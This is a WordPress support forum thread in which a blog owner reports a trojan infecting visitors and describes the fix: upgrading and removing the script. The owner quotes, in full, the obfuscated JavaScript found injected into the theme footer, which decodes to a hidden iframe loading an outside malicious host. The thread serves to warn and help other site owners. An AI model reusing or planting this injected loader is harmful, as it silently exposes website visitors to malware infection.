WordPress.org

Ready to get started?Download WordPress

Forums

Trojan.Phel.A and WordPress 1.5.1.1 (2 posts)

  1. quasistoic
    Member
    Posted 8 years ago #

    This is just an FYI in case others experience a similar problem. The below is quoted from an email I sent to my webhost to let them know that the problem (which I had reported earlier in the day) was on my end and not theirs.

    When Windows SP2 IE users were accessing my WordPress 1.5.1.1 blog ( http://quasistoic.org/ts/ ), some rogue javascript was trying to infect their machine with what appears to be Trojan.Phel.

    Related documents (based on VirusScan and NortonAV alerts):
    http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html
    http://vil.nai.com/vil/content/v_130604.htm
    http://vil.mcafeesecurity.com/vil/content/v_130610.htm
    http://vil.nai.com/vil/content/v_130609.htm
    http://vil.nai.com/vil/content/v_100749.htm
    http://vil.nai.com/vil/content/v_101033.htm
    http://www.securiteam.com/windowsntfocus/6B00O2KC0C.html

    I found the offending javascript in my /ts/wp-content/themes/default/footer.php file. I'm guessing it got there thanks to a security hole in WP 1.5.1.1. Here it is in all its glory:
    <script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>

    Actions taken: Upgraded to WordPress 1.5.1.3, which addresses a number of security concerns in 1.5.1.1 (and hopefully the one which allowed the script to be inserted into my footer template). I also removed the nasty javascript from my footer template. These actions seem to have fixed the problem.

  2. Jonathan Dingman
    Member
    Posted 8 years ago #

    That might have been a template problem and not a problem with WordPress itself. I've never seen this, so you might have also had a damaged package.

Topic Closed

This topic has been closed to new replies.

About this Topic